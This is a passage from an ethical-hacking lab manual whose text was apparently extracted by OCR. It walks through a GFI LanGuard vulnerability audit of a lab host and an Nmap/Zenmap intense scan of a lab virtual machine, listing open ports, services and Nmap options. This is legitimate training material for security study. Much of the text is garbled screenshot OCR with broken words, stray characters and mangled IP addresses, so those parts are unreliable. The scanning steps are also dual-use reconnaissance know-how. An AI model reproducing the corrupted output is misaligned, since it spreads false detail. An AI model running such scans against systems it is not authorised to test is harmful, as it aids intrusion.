The average vulner abilty le.ei lor ttus sea־nr s 1
Results statistics:
Audit operations processed; Missing scftwaie updates: Other vulnerabilities: Potential vulnerabilities:
4 Scan target: locatbo»t- y) 52 10 0 0 7 IWDI-039MR5II19C4] (WhkJvws .
Scanner ActMty Wkxkm •יז CanptJer *ו CitarW f a : i l i « ! * W VJUH> ra W Jt« !a i K t - n •can n » t41:ate 101 r ״11 r sq v wunr is *lvatd or not found i
----------12- 1
FIGURE 5.7: The GFI LanGuard Custom scan wizard9. To check die Scan Result Overview, click IP a d d re ss of die machiiiein die
right panel
10. It shows die V u ln erab ility A sse ss m e n t and N etw ork & S o ftw are Audit:
click V u ln erab ility A sse ssm e n t
GFI LanGuard 2012
W, Dis c u m tvs vtssaanJ | ^ | Daihboard Sean RnrwUr AdMyMorilor Reports Configuration UtMwsE -PceSe
ocafost v j. . . | |F״IS1״־ * ו *Q i33iT~.it.. Userrvaae: ?a££׳.Crd:Cj־end, bcaec on user II J ••• 1 ___^ ____1
1 Results Details
W»UJ39MRSHL9f4| (Windows Server ?01? 164)] ׳
Vulnerability level:
T►•* corrvwar dues not have a Vuhe'aHty te.el •VII. * :
Y/lttt dim irean?
Possible reasons:
t. Th• •can b not Inched yet2.OsCectbn of missing paiches and vane׳ abiEe* 8 smUta * «ליינ »ca1׳nir a erode used to perform the scan.The credentials used 10 scan this confute ־3 ׳ 0ג not »1: * 9* «cnty ecamer 10 retrieve an required tafomwtion 10• escmatra we Vjheraoity Level An account wth s M ir r a , • :rvjeges or rne target computer B requrM * Certan securty srttnqs on the remote conpuler Dtoct r * access 0( Ite security scanner. Betam s a fart of most
# V a n tn ry t : lornlhost |V |WIW l)J9MIC>Mt9L4l (Window. J] jר־ 1000 - |
« , <1>rrafcj1ty W ^ n rrn t |•־ n Net-war* & Softwire Audit
I
Scaruicr ActMty Window
flteetlKMQL llirvd l (klh•) u..״ M •' ■<V> I Ic— tfiiSldri I ftwwl
FIGURE 5.8: Selecting Vulnerability Assessment option
Types of scans:m
Scan a single computer: Select this option to scan a local host or one specific computer.Scan a range of computers: Select this option to scan a number of computers defined through an IP range.Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list.Scan computers in test file: Select this option to scan targets enumerated in a specific text file.Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 117
M odule 03 - S can n in g N e tw o rk s
11. It shows all the V u ln e ra b ility A s s e s s m e n t indicators by categoryV GFI LanGuard 2012 T־־ ^ P x ־
L d > ־» Dashboard Scan Rernediate Activity Men!tor Reports Configuration UUkbes W, Di 8cub8 •»a v«a«on._
la —d i a Merc Scan
Bar Target; »roS»:v || .. . Hi scar- 3 $
c/fomess Jgynang: Password:[amr#y iCQjjetf on user V1 5or
A
Sc4nR*M1ft>0«UNk
Vulnerab ility Assessm ents«tea ene of the folowno wjfcerabilry 01*99'** ייה«*ל
*qn security Vumeratxaties (3)Xbu you to analyze the 1 ״0־ security vjretb i'.a
(6) Jedium Security VulneraNKies■ ^to anajy7e ths rredun !ear ity tfjrerabises ,וגי
(14 Low Security Vulnerabilities . 15iy» the lc« 9eculty׳ycu to a
(1) Potential vulnerabilities . o־־Xb>.s you to a-elvre tiie information security aJ
Ufesing S«1 vtca Packs and Updala RolHipc (1) U>»3vcutoane(yK thcrm eiroiervm pK tsnV m evn
Scmi Rr»ulU Ov*rvt*%»<0 $ u a U r« « t : l1 )u lm lf S IS ItM J(m R-KM M UHUM ](W M tom .
- • Yuhefablty AssessmentA security wirerablof a (3) **־י J l MeCtom Searity Vuherabirtes (6) j , low Searity Viinerablitfes (4J 4 PofanBd Vuherabltea (3) t Meshc service Packs and U3cate =&u>s (1}# Msarvs Security Updates (3)
- _* Hee*ak & Software Ault
thread I (Idle) |Scan Pvead 7 (•is' I 5 u n t1 «: 3 Otfic] Bras
/ 7 During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities including:■ Missing Microsoft
updates■ System software
information, including unauthori2ed applications, incorrect antivirus settings and outdated signatures
■ System hardware information, including connected modems and USB devices
FIGURE 5.9: List of Vulnerability Assessment categories12. Click N etw ork & S o ftw are A udit in die right panel, and then click S y ste m
P atch in g S ta tu s , which shows all die system patching statuses
to■ > • 4 - 1C r i LinO uard 2012 1- ״r״1
Dashboard Sran Re״»*Aate Activity Monitor Rrpoits Configuration JMMet <U) ' D iic in tllm vm*an
lau ad ia New Sean
Scar ’ • o e -־ Ho ft*.
1־״' ^ 1- v | •Oafattab: J s e n r e ; P315/.ord:|0 rrentf> og c« or uer ־1 Sari
1 Remits Detais
System Patching StatusSelect one of tte Mtahg system wtchro M U
(1) *Minting Service Packs ■•nit llpduir Rciaup K! server parW r>f»—j i w«־AI3v»1 you to andyM f*r rrs
Mk Missing Security Updates (,J)Alotwt Mu U nWy.'t u!« mistfio mcuICv update I '0 - Jb j■
(16) m Missing Non-Security UpdatesAlan* you to analyie the rwn-security ipaaws rfamssen
(2) J% staled Security Updates nay 2c tJic knitaifed security !edate hfanala■ט ־ A1qt>s you
(1) J% !astaaed Non-Security Updates 5 you to analyze the nstslicd nor-securty״יAlo
SCM R « M b Overview
- 9 Scan tarvet iocalhost- 3 1 8 I M A / [W » 0 3 9 N R S W « 4 ] ( I M l t K - m
S -4 (U־!f(hilY to n T e il* *eh Secvlty V1*1eraMittet (3)X rvfcdun Security VUrtrabilBe• (6)X “Sec יי«־ ' >ty\\1h»ab4U»» (4)X *JnaraMt)•• (ג)t Service Pnrin mi 1t3datr Roittn (1)f •1su1sSeu1UyUl>0at«*(3)I ״ \ftoary. a ftraarc ruOt I
S % Ports U A rtor&Atrc *»- f i Software a system mibnnaaon
Scanner Actmty Wmdow X
Starting security scan of host \VIM.I)MMRSMl«4[10 0.0 T\ g!■nr: IM k U PM
™ 3 «.t :1.0! י'ry Scan thread 1 (idle) S a tllia i IM t:
FIGURE 5.10: System patching status report13. Click Ports, and under diis, click Open T C P Ports
Due to the large amount of information retneved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 118
M odule 03 - S can n in g N e tw o rk s
1- 1■■GF! LanGuard 2012CJ, Uiscuu tins 1Scan Rancdijlr £*!1vty Monitor Reports Corrfigura•> l«- I&
jbcahoK V I ... I |MSw1 י י ו •Oc0en־.dfe. Uenvaae: SasGword:|0xt«rtK ocKcC on us®־ - II 1___ * = ____1
• ft) so iDf*crpno״: Mytxrtrrt trerwfrr Protocol { »sr-wr: http (kt/0er r < ליודז t Tfonjfcr rvotocoOI 9 ״Cwucto- DCC w»i1u) כג5 l ־»sOl)0»׳£ 1 f) ►**CTt*0׳V HMKCR 5M»1׳ S*rM» ! S*׳VCT r « » [n״^ 44J Pfiapton: MooioftOS k tt* Omlav, VNntfcM* V a n fimitw: Lrtnamn]
B £ !027 piMotOor: !r#l»1fo, 1( tM& *e׳ v<e h no* t1׳»Urt(d :*•>*« caJO &• Croj r: Ctandwone, Ditdflpy *rd others / Sev»C s ^ t-.H |Deunpecr: LSASS, If Iha » m « is not ratafc* be-*ae ratfc ;<■ » o w : Ctotafipy Network x, Oath am3 owers / Ser- 9 ::- 2 |C«SObacn: Me Protect. MSrtQ, t te״ 1 V. M >)eic -־ י-» - » * c ro( IrsUltod D*m«r* could ttt trojan: BLA trojan . Se 4׳ « £ l2^l|t«croor:Nfss1i5Jcar1ty5canr*rr/servct:1r*n0M ^9 ^ 1433 [CesccCcr: Microsoft SQL Server database r a a־ j r w : srtscn Server /S«־>ic*: LTknown]
9 sr.Mi f . ר ׳ get־ torn lho\tR •־ : ; 10.0.0.7 |WIN-D39MR5H19C4| (W m dvn _
- • viAwjBMy **OMtwrntJ l (!) «*h Sacuity »\jh*r<t14t(*־ ^ M«Jum Sttuity VllnefdMIUe( « }X Law Seeunty VUnerabttiei (4}^ POCWlOai Viiic'attittet (3)# Moang Service Pocks 0״d tpdstr lo ttos CO# MsangSecuity Updates (3)
B *•ernoHc 81 Software Audit*. ( ( System Patch rg Status333]־
I . Seen HP Para W |•V Coen LC» Ports (5)
I A Hardware .if Software
I I System [nfbmodon
a — er ActKRy YVlndvw
•vl ! ;<*) error*׳.r 50־ | (dp) י nr rad ״y v a n thread 1 (tdlr) So׳ceve׳*»f..<»t*'
FIGURE 5.11: TCP/UDP Ports result
14. Click S y ste m Inform ation in die light side panel; it shows all die details of die system information
m A custom scan is a network audit based on parameters, which you configure on the fly before launching the scanning process.Vanous parameters can be customized during this type of scan, including:■ Type of scanning profile
(Le., the type of checks to execute/type of data to retrieve)
■ Scan targets■ Logon credentials
15. Click P a ssw o rd Po licy
r־־° n nGH LanGuard 2012
E B > 1 4 - 1 Dathboaid Scan fn m i j l r Act*«y Monitor Reports C orriiguratioo Ualiwt W. 1)1*1 lew •«« vnun
launch a Mew sean
ScarTarget P0.־«t:ocaKx: v |... I (׳SjIScan 3 •
&ederate: ?aaiwd:Z~M~CTt, bcced on toe־ V 1 U1J 1__
Scaf 0 0 כפ .-.
Scan R rta tf Overview Scan le a k ! Deta lieJ *־*׳!run poaawd length: 0 charsJ Vaxnuri EMSSiwrd age: 42daysJ **״!־unoaa'wordsgeiodays J ! f a s «p ff r m force J >Mgw0rfl mtary: noh ׳ ttay
% open IX P Ports (5)Sf A r1ard*«e ׳ ־1־ 50* fr»ane
| Systsn Infer׳TMharja 9ki\׳. W, |l HW.\fxC. !■■>>•>1• S«r.c1ll> Audit Policy (OtO
Wf Re0**vft Net&OS Mao*3) ״ )% Computettj| 610Lpt (28)& Users (4)•!_ Logged Cn Users (11)^ Sesscre (2)% J<rvcc5 {148}■U Processes (76), Remote TOO (Tme Of Oay)
Scanner AcUv«y Window
׳ ••־ ״ I I >«- ׳ V ־n thn-rtd I (Klfc•) ScantheflUC*) i f<* 41״1 ! ׳' ' ’A) I י י ׳ "'
FIGURE 5.12 Information of Password Pohcy16. Click G roups: it shows all die groups present in die system
L_J The next job after anetwork security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 119
M odule 03 - S can n in g N e tw o rk s
׳ר -T o -GFI LanGuard 2012U19CUB3 Ultt VWttKJR—Dashboard Sun ftftnca&e Actmrty Monitor Reports Configuration>־ *
v l W **Scan HCr M erest -igemane: Password:[cuT€r*f eooed cn user *1
■ cc ':e ra
Sc*• RevuJU DeUikControl AucUat* Cws abx 1
* P n t ta w i 0*Ji.s 0u«1»to1׳cmfcw aw# dccm wraO (V'tey jMו ויו ->׳ ו׳ CfctrtutedCCMUser*&*nt Log Straefcrs GuestsK>pe׳ V Adrritstrators
E5JUSRSr.etY>=׳< Ccnfig.rstcn Cp־rators Psrfertrsnce Log UsersPr־fty1r 5rcc '\r ~a usersPM^lSers**?OperatorsRES Ehdpcut ServersPCS Manage ״»ent s « vers
* tt ■ ft • ft• X• a• a י a• a• a יי a• a ״-a• a• a » a• « ז a
1 R«f»*lt» Overview% C0«nUOPPwts(5)
r A Hentesrc• . 1 Soffaart• ^ Symrm tnk׳m»t»n
*k SN r~W-4* Pd«wo1׳ ) Pdiy
- i» Sxunty Ault Pokey (Off) # lUotetry ־f t NetflCCS Narres (3)% Computer l*i groups (2a) II W4}•?. -OXfC 0״ users (1 נ)% S«ss»ns (2)% 5«14) 8»:*לa)Ht ®rocrase* (76)
(Of 0»y מיוחן en»te too ג
W w r t * ״ - . S*rf« 1 l1f1 .nl 1 (tdl•׳) | Scan tfve*0 ? frt*) *r«*d S *fe) | & u « |
FIGURE 5.13: Information of Groups17. Click die D ashboard tab: it shows all the scanned network information
1 °n ^ GFI LanGuard 2012׳
I Dashboardl Sun Km•*•(• Activity Monitor Reports Configuration UUkbe; ־./זי OitcuMlna vwawn.-
! t f# \'i\ ^ 4 V fei v (1 * t *JC emctm •w«v ViAirrnhlfces Pale►** ► aH SdNiare
> «- I q ״5
Gmp
Entire N etw ork -1 com pute r
Security Seniorswnwarn iwuw•1 o0 c«XT־|H1tcrs ^ !K-p-w ז 0 coneuteis
Service Packs and U- Lratra-onied Aco*c Malware Protection ...כ O cjOaxrputers C co־pu־crj computers ו
VulncraWWies _ Ault SMTUt : _ Agent Hemtn IssuesI o •1 co״pot«r9 «י״יד» ! 0 j 0 C0npu18C8
r S \Most Mrarane cawoJSfS
V. SC3y׳ ^ L 3 6 4
,AiirraNity Trend Owe' tme
fu tM By Gperatng System־o:
oComputes S ■ O0«ath■ ■. | Compjters By rfeUai... |
Computer V14>erabfey CBtnbuliviw
1*aer*Stofcg|\>3tStafcg|
it 6mel1n*orkf j UKJ»-c«t: ttlh-03»Ma.5rt.4£-»
<ucj1!)<»w>:y10«j<1iR<x1^' ־
Maraqe saerts *41 •»?i ■.KTJlii...
Sc-=r a d rsfrar. !TfaraaLgi p.gyyZjHar- scan...Sec :ppdy-.ai - Cpm:-jr_
FIGURE 5.14: scanned report of the netvrork
L a b A n a ly s is
Dociunent all die results, direats, and vulnerabilities discovered during die scanning and auditing process.
m A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high.
A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically.
m It is recommended to use scheduled scans:■ To perform
periodical/regular network vulnerability scans automatically and using the same scanning profiles and parameters
• To tngger scansautomatically after office hours and to generate alerts and auto- distribution of scan results via email
■ To automatically trigger auto-remediation options, (e.g., Auto download and deploy missing updates)
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 120
M odule 03 - S can n in g N e tw o rk s
Tool/Utility Information Collected/Objectives Achieved
Vulnerability Level
Vulnerable Assessment
System Patching Status
Scan Results Details for Open TCP Ports
GFI LanGuard 2012
Scan Results Details for Password Policy
Dashboard - Entire Network■ Vulnerability Level■ Security Sensors■ Most Vulnerable Computers■ Agent Status■ Vulnerability Trend Over Time■ Computer Vulnerability Distribution■ Computers by Operating System
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
1. Analyze how GFI LANgtiard products provide protection against a worm.
2. Evaluate under what circumstances GFI LAXguard displays a dialog during patch deployment.
3. Can you change die message displayed when GFI LANguard is performing administrative tasks? If ves, how?
Internet Connection Required
□ Yes 0 No
Platform Supported
0 Classroom 0 iLabs
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 121
M odule 03 - S can n in g N e tw o rk s
E x p lo r in g a n d A u d i t i n g a N e t w o r k
U s i n g N m a pN /n a p (Z e n m a p is th e o ff ic ia l A ',m a p G U I) is a f ir e , o p e n s o u rc e (lic e n s e ) u t ilit y fo r
n e tw o rk e x p lo ra tio n a n d s e c u rity a u d itin g .
L a b S c e n a r io
111 die previous lab you learned to use GFI LanGuard 2012 to scan a network to find out die vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. A11 administrator and an attacker can use die same tools to fix or exploit a system. If an attacker gets to know all die information about vulnerable computers, diey will immediately act to compromise diose systems using reconnaissance techniques.
Therefore, as an administrator it is very important for you to patch diose systems after you have determined all die vulnerabilities in a network, before the attacker audits die network to gain vulnerable information.
Also, as an e th ica l h a c k e r and n etw o rk adm in istrato r for your company, your job is to carry out daily security tasks, such as n etw o rk inventory, service upgrade sch e d u le s , and the m onitoring of host or service uptime. So, you will be guided in diis lab to use Nmap to explore and audit a network.
L a b O b je c t iv e s
Hie objective of diis lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host 01 service uptime and downtime.
hi diis lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and dieir topology
■ Determine the types of packet filters
I C O N K E Y
Valuableinformation
Test vourknowledge
S Web exercise
ט Workbook review
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 122
M odule 03 - S can n in g N e tw o rk s
■ Record and save all scan reports
■ Compare saved results for suspicious ports
L a b E n v ir o n m e n t
To perform die lab, you need:
■ Nmap located at D :\CEH -Tools\CEH v8 M odule 03 S can n in g
N etw o rks\Scan n ing Tools\N m ap
■ You can also download the latest version of N m ap from the link http: / / nmap.org. /
■ If you decide to download die la te s t v ersio n , dien screenshots shown in die lab might differ
■ A computer running W indow s S e rv e r 2012 as a host machine
■ W indow s S e rv e r 2008 running on a virtual machine as a guest
■ A web browser widi Internet access
■ Administrative privileges to run die Nmap tool
L a b D u r a t io n
Time: 20 Minutes
O v e r v ie w o f N e t w o r k S c a n n in g
Network addresses are scanned to determine:
■ What services a p p lic a t io n n a m e s and v e r s io n s diose hosts offer
■ What operating systems (and OS versions) diey run
■ The type of p a c k e t f ilte rs/ f ire w a lls that are in use and dozens of odier characteristics
/—j T o o ls d em o n strated in th is lab a re av a ilab le in D:\CEH- T o ols\C EH v8 M odule 03 Sca n n in g N etw o rks
.Q Zenmap works on Windows after including Windows 7, and Server 2003/2008.
L a b T a s k s
Follow the wizard-driven installation steps and install Nmap (Zenmap) scanner in die host machine (W indow S e r v e r 2 012).
1. Launch the S ta r t menu by hovering die mouse cursor in the lower-left corner of the desktop
TASK 1In ten se S c a n
FIGURE 6.1: Windows Server 2012—Desktop view
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 123
2. Click the N m ap -Z en m ap G U I app to open the Z e n m a p window
M odule 03 - S can n in g N e tw o rk s
S t 3 f t A d m in is tra to r
ServerManager
WindowsPowrShell
Google Hy^-VManager
Nmap - Zenmap
Sfe m * י וControlPanel
»■vp*vVirtualMachine..
o w
eCommandPrompt
ח*
Frtfo*
©Me sPing HTTPort
iSWM
CWto* K U1
l_ Zenmap file installsthe following files:■ Nmap Core Files■ Nmap Path■ WinPcap 4.1.1■ Network Interface
Import■ Zenmap (GUI frontend)■ Neat (Modern Netcat)■ Ndiff
FIGURE 6.2 Windows Server 2012 - Apps3. The N m ap - Z e n m a p G U I window appears.
! Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification}
FIGURE 6.3: The Zenmap main windcw/ In port scan
techniques, only one 4. Enter the virtual machine W in d o w s S e r v e r 2 0 0 8 IP a d d re s s (10.0.0.4)method may be used at a t!1e j a r ge t: text field. You are performing a network inventory fortime, except that UDP scan r o J.and any one of the the virtual machine (sU־)SCTP scan types (־sY, -sZ)
111 tliis lab, die IP address would be 1 0 .0 .0 .4 ; it will be different from your lab environment
111 the P ro file : text field, select, from the drop-down list, the typ e of
p ro file you want to scan. 111 diis lab, select In te n s e S c a n .
may be combined with any 5.one of the TCP scan types.
6.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 124
M odule 03 - S can n in g N e tw o rk s
7. Click S c a n to start scantling the virtual machine.
- ׳׳ ° r xZenmap
Profile: Intense scan
Scan Io o ls P rofile Help
Target: 110.0.0.4|
Command: nmap -T4 -A -v 10.0.0.4
Ports f Hosts | Topology | Host Details | ScansNmap Outputicc> |H os t! Services
OS < Host
FIGURE 6.4: The Zenmap main window with Target and Profile enteredNmap scans the provided IP address with In te n s e s c a n and displays the s c a n re s u lt below the N m ap O u tp ut tab.
^ ם יז X ן
8.
Z e n m a p
10.0.0.4 ׳י Profile: Intense scan Scan:
Scan Io o ls Erofile Help
Target:
Command: nmap -T4 -A -v 10.C0.4
N n ■ap O utput [ports / Hosts | Topo log) | Host Details | Scans
nmap -T4 •A ■v 10.00.4 ^ | | Details
S t o r t i n g Nmap C .O l ( h t t p : / / n m s p .o r g ) a t 2012 08 24
NSE: Loaded 93 s c r i p t s f o r s c a n n in g .MSE: S c r ip t P re -s c a n n in g .I n i t i a t i n g ARP P in g Scan a t 1 5 :3 5 S c a n n in g 1 0 . 0 .0 . 4 [1 p o r t ]C o m p le te d ARP P in e Scan a t 1 5 :3 5 , 0 .1 7 s e la p s e d (1 t o t a l h o s ts )I n i t i a t i n g P a r a l l e l DNS r e s o lu t io n o f 1 h o s t , a t 1 5 :3 5 C o m p le te d P a r a l l e l DNS r e s o lu t io n o f 1 h o s t , a t 1 5 :3 5 , 0 .5 0 s e la p s e dI n i t i a t i n g SYN S te a l t h Scan a t 1 5 :3 5 S c a n n in g 1 0 . 0 .0 . 4 [1 0 0 0 p o r t s ]D is c o v e re d open p o r t ׳!135 t c p on 1 6 .0 .0 .4D is c o v e re d open p o r t 1 3 9 / tc p on 1 0 .0 .0 .4D is c o v e re d open p o r t ׳4451 t c p on 1 6 .0 .0 .4I n c r e a s in g send d e la y f o r 1 6 .0 .0 .4 f r o « 0 t o dee t צ o 72o u t o f 179 d ro p p e d p ro b e s s in c e l a s t in c re a s e .D is c o v e re d open p o r t 4 9 1 5 2 / tc p on 1 0 .0 .6 .4D is c o v e re d open p o r t 4 9 1 5 4 / tc p on 1 0 .0 .6 .4D is c o v e re d open p o r t 4 9 1 5 3 / tc p on 1 0 .0 .6 .4D is c o v e re d open p o r t 4 9 1 5 6 / tc p on 1 0 .0 .6 .4D is c o v e re d open p o r t 4 9 1 5 5 / tc p on 1 0 .0 .0 .4D is c o v e re d open p o r t 5 3 5 7 / tc p on 1 0 .6 .0 .4
OS < Host
׳ 10.0.0.4 ׳
Filter Hosts
FIGURE 6.5: The Zenmap main window with the Nmap Output tab for Intense Scan9. After the scan is c o m p le te , Nmap shows die scanned results.
While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them
!S" The six port states recognized by Nmap:■ Open■ Closed■ Filtered■ Unfiltered■ Open | Filtered■ Closed | Unfiltered
Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 125
M odule 03 - S can n in g N e tw o rk s
T= IZ e n m a p
Scan Io o ls £ro file Help
Scan! CancelTarget:
Command: nmap -T4 -A -v 10.C.0.4
Detailsכ י פNm ap O utput | Ports / Hosts | Topo log) J Host Details | Scans
nmap •T4 •A ■v 10.0.0.4
M ic r o s o f t HTTPAPI h t t p d 2 .0
n e tb io s - s s n n c tb io s ssn h t t p
1 3 9 / tc p open 445/tcp open5 3 5 7 / tc p open (SSOP/UPnP)|_http־m«thods: No Allow or Public h«ad«r in OPTIONS re s p o n s e ( s t a tu s code 5 03 )| _ r r t t p - t i t l e : S e r v ic e U n a v a ila b le
ח
M ic r o s o f t W indows RPC M ic r o s o f t W indows RPC M ic r o s o f t W indows RPC M ic r o s o f t W indows RPC M ic r o s o f t W indows RPC
;0 7 :1 0 ( M ic r o s o f t )
4 9 1 5 2 / tc p open 4 9 1 5 3 / tc p open 4 9 1 5 4 / tc p open 4 9 1 5 5 / tc p open 4 9 1 5 6 / tc p open MAC Address: 0(
m srpc m srpc m srpc m srpc m srpc
______________ 1 5 :5D:D e v ic e t y p e : g e n e ra l purpose R u n n in g : M ic r o s o f t WindONS 7 | 2008 OS CPE: c p « : / o : n׳ ic ro s o f t :w in d o w s _ 7 c p e : / o :» ic r o s o f t :w in d o w s _ s e rv e r_ 2 0 0 8 : : s p l0 ל d e t a i l s : M ic r o s o f t W indows 7 o r W indows S e rv e r 2008 SP1 U p tim e g u e s s : 0 .2 5 6 d ays ( s in c e F r i Aug ?4 0 9 :2 7 :4 0 2012)N ttw o rK D is ta n c e ; 1 hopTCP S cuuctice P r e d ic t io n : D i f f i c u l t y - 2 6 3 (O ood lu c k ! )IP IP S equence G e n e ra t io n : In c re m e n ta lS e rv ic e I n f o : OS: W indow s; CPE: c p e : /o :n ic r o s c f t :w in d o w s
OS < Host
׳ 10.0.0.4 ׳
Filter Hosts
FIGURE 6.6: The Zenmap main window with the Nmap Output tab for Intense Scan10. Click the P o rts/H o sts tab to display more information on the scan
results.
11. Nmap also displays die Po rt, P ro to co l, S ta te . S e r v ic e , and V e rs io n ofthe scan.
T ־ TZenmap
Scan Cancel
Scan Io o ls P rofile Help
Target: 10.0.0.4
Command: nmap -T4 -A -v 10.0.0.4
Nmgp Out p u ( Tu[ . ul ut j y Hu^t Details Sk m :.
M in o a o ft W indows RPCopen rm tpc13S U p
M icroso ft HTTPAPI h ttpd 2.0 (SSD
M icroso ft W indows RPC
M icroso ft W indows RPC
M icroso ft W indows RPC
M icroso ft W indows RPC
M icroso ft W indows RPC
netbios-ssn
netbios-ssn
http
msrpc
msrpc
msrpc
msrpc
msrpc
open
open
open
open
open
open
open
open
tcp
tcp
tcp
139
445
5337
49152 tcp
49153 tcp
49154 tcp
49155 tcp
49156 tcp
Services
OS < Host
״״ 10.0.0.4
a The options available to control target selection:■ -iL <inputfilename>■ -1R <num hosts>■ -exclude
<host 1 > [,<host2> [,...]]■ -excludefile
<exclude file>
Q The following options control host discovery:■ -sL (list Scan)■ -sn (No port scan)■ -Pn (No ping)■ ■PS <port list> (TCP
SYN Ping)■ -PA <port list> (TCP
ACK Ping)■ -PU <port list> (UDP
Ping)■ -PY <port list> (SCTP
INTT Ping)■ -PE;-PP;-PM (ICMP
Ping Types)■ -PO <protocol list> (IP
Protocol Ping)■ -PR (ARP Ping)■ —traceroute (Trace path
to host)■ -n (No DNS resolution)■ -R (DNS resolution for
all targets)■ -system-dns (Use
system DNS resolver)■ -dns-servers
< server 1 > [,< server 2 > [,. ..]] (Servers to use for reverse DNS queries)
FIGURE 6.7: The Zenmap main window with the Ports/Hosts tab for Intense Scan
C E H Lab M anual Page 126 Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
12. Click the T o p o lo g y tab to view Nmap’s topology for the provided IP address in the In te n s e s c a n Profile.
FIGURE 6.8: The Zenmap main window with Topology tab for Intense Scan13. Click the H o st D e ta ils tab to see die details of all hosts discovered
during the intense scan profile.r ^ r ° r * 1Zenmap
Scan Conccl
Scan lo o ls Profile Help
Target: 10.0.0.4
Command: nmap -T4 -A -v 10.0.0.4
Scan?Hosts || Services I I Nm ap O utput I Porte / H oc tt | Topologyf * Hn^t
O.O.C.4
H Host StatusState: up
Open p o rtc Q
Filtered ports: 0
Closed ports: 991
Scanned ports: 1000
U p tim e : 22151
Last boot: Fri A ug 24 09:27:40 2012
B AddressesIPv4: 10.0.0.4
IPv6: Not available
MAC: 00:15:50:00:07:10
- Operating SystemName: M icroso ft W indows 7 o r W indows Server 2008 SP1
#
Accuracy:
Ports used
OS < Host
־׳- 10.0.0.4
Filter Hosts
FIGURE 6.9: The Zenmap main window with Host Details tab for Intense Scan
7^t By default, Nmap performs a host discovery and then a port scan against each host it determines to be on line.
7 By default, Nmap ׳determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32).
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 127
M odule 03 - S can n in g N e tw o rk s
14. Click the S c a n s tab to scan details for provided IP addresses.
1- 1 ° xZ ׳ e n m a p
CancelIntense scanProfile:
Scan Tools Profile Help
Target: 10.0.0.4
Command: nmap •T4 •A -v 100.0.4
Hosts \\ Services | Nm ap O utput J Pcrts.' Hosts | Topology | Host D etail;| S:an;
Status Com׳r»ard
Unsaved nmap -T4-A •v 10.00.4OS < Host
100.04
i f ■ Append Scan » Remove Scan Cancel Scan
FIGURE 6.10: The Zenmap main window with Scan tab for Intense Scan15. Now, click the S e r v ic e s tab located in the right pane of the window.
This tab displays the l i s t of services.
16. Click the http service to list all the HTTP Hostnames/lP a d d r e s s e s .
Ports, and their s t a t e s (Open/Closed).* ־ד י ° Zenmapזמ
Scan Tools Profile Help
Target:
Comman
10.0.0.4 v ] Profile: Intense scan v | Scan | Cancel
d: nmap •T4 -A -v 10.0.0.4 וHosts | Services Nmap Output Ports / Hosts Topology | H octD rtJ iik | S ^ jn t
< Hostname A Port < Protocol « State « Version
i 10.0.04 5357 tcp open M icrosoft HTTPAPI hctpd 2.0 (SSI
<L
Service
msrpc
netb ios55־n
a Nmap offers options for specifying which ports are scanned and whether the scan order is random!2ed or sequential.
a In Nmap, option -p <port ranges> means scan only specified ports.
Q In Nmap, option -F means fast (limited port) scan.
FIGURE 6.11: The Zenmap main window with Services option for Intense Scan
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 128
M odule 03 - S can n in g N e tw o rk s
17. Click the m srp c service to list all the Microsoft Windows RPC.
ז1םי ־ x ׳Zenmap
10.0.0.4 י Profile: Intense scan Scan]
Scan Io o ls P rofile Help
Target:
Command: nmap -T4 -A -v 10.0.0.4
Topology | Host Details ScansPorts / HostsNmap Output
4 Hostname *־ Port < Protocol * State « Version
• 100.0.4 49156 U p open M icrosoft W ind o ro RPC
• 100.0.4 49155 tcp open M icroso ft Windows RPC
• 100.0.4 49154 tcp open M icroso ft Windows RPC
• 100.04 49153 tcp open M icroso ft Windows RPC
• 100.04 49152 tcp open M icroso ft Windows RPC
• 100.0.4 135 tcp open M icroso ft Windows RPC
Services
Service
http
netbios-ssn
In Nmap, Option — port-ratio cratioxdedmal number between 0 and 1> means Scans all ports in nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0 and 1.1
